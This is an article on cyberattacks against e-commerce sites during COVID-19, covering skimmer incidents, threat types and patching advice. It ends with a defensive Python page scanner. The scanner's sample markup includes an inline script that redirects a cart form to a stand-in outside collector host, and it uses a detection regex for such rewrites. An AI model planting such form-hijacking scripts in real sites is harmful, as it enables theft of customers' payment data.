During the COVID-19 epidemic, the sophistication of cyberattacks has grown manifold, and e-commerce is one of the worst-hit segments, frequently targeted by innovative cyberattackers.
Recent attacks on e-commerce
The e-commerce industry has witnessed several cyberattacks in recent months.
- In April 2020, a new Magecart skimmer dubbed MakeFrame compromised at least 19 different e-commerce websites to steal the payment card details of their customers.
- In March 2020, hackers collected around $1.6 million by selling over 239,000 payment card records on the Dark Web. The records were collected from thousands of online shops running a vulnerable version of Volusion e-commerce software.
- In January 2020, hackers were seen targeting e-commerce sites powered by AmeriCommerce software by injecting a malicious script with the ‘Add to cart’ button; the script could change the value of the form’s action parameter.
Key threats to e-commerce
An e-commerce website may be targeted by cybercriminals in any one of the following ways:
- Malware: Cybercriminals may use malware (such as Pipka, JS-sniffers, Saefko, etc.) to target e-commerce websites.
- Phishing: Several cybercriminals were seen running phishing websites to lure their victims, as was observed in the case of MakeFrame, Amazon Prime, Amazon Alexa, and Google Home.
- Vulnerabilities: The attackers may also attempt to exploit the vulnerabilities in the e-commerce website, as was the case with Amazon Echo Show, Verisign, Blink XT2, Amazon Kindle, etc.
- Data Theft: Attackers also often target the e-commerce websites for the valuable data they hold, like credit or debit card details. Some recent examples of such attacks include PinnacleCart Server-Side Skimmers, Volusion, PlanetDrugsDirect, etc.
How to stay safe
Businesses involved in e-commerce should keep their websites and IT infrastructure up to date with the latest patches. Regular audits and scans for vulnerabilities and rogue code can help close any loopholes in security.
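
One way to automate part of such a scan is sketched below. It is an added example, not code from the article or from any vendor named in it. It statically audits a rendered shop page for scripts and form targets outside an allowlist, and for inline scripts that rewrite a form's action, the behaviour reported in the January 2020 case. The host names in ALLOWED_HOSTS and the sample markup are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this shop legitimately loads scripts from or posts forms to.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}
# Inline code that assigns a form's action at runtime (not a == comparison).
ACTION_WRITE = re.compile(r"""\.action\s*=[^=]|setAttribute\(\s*['"]action['"]""")

class PageAudit(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = allowed_hosts
        self.findings = []
        self.inline = False  # True while inside a <script> without src

    def _off_site(self, url):
        host = urlparse(url).hostname  # None for relative (same-origin) URLs
        return host is not None and host.lower() not in self.allowed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.inline = "src" not in a
            if self._off_site(a.get("src") or ""):
                self.findings.append(("external-script", a["src"]))
        elif tag == "form" and self._off_site(a.get("action") or ""):
            self.findings.append(("form-action", a["action"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self.inline = False

    def handle_data(self, data):
        if self.inline and ACTION_WRITE.search(data):
            self.findings.append(("inline-action-write", data.strip()[:60]))

def audit(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (finding_type, evidence) tuples for one page."""
    parser = PageAudit(allowed_hosts)
    parser.feed(html)
    return parser.findings

# Constructed sample page: one unknown script host, one inline action rewrite.
SAMPLE = """<script src="/static/cart.js"></script>
<script src="https://stats.unknown.example/t.js"></script>
<form id="buy" action="/cart/add"><button>Add to cart</button></form>
<script>document.getElementById("buy").action = "https://collect.unknown.example/p";</script>"""
```

Because this is a static check, it complements rather than replaces file-integrity monitoring of the server-side templates and scripts.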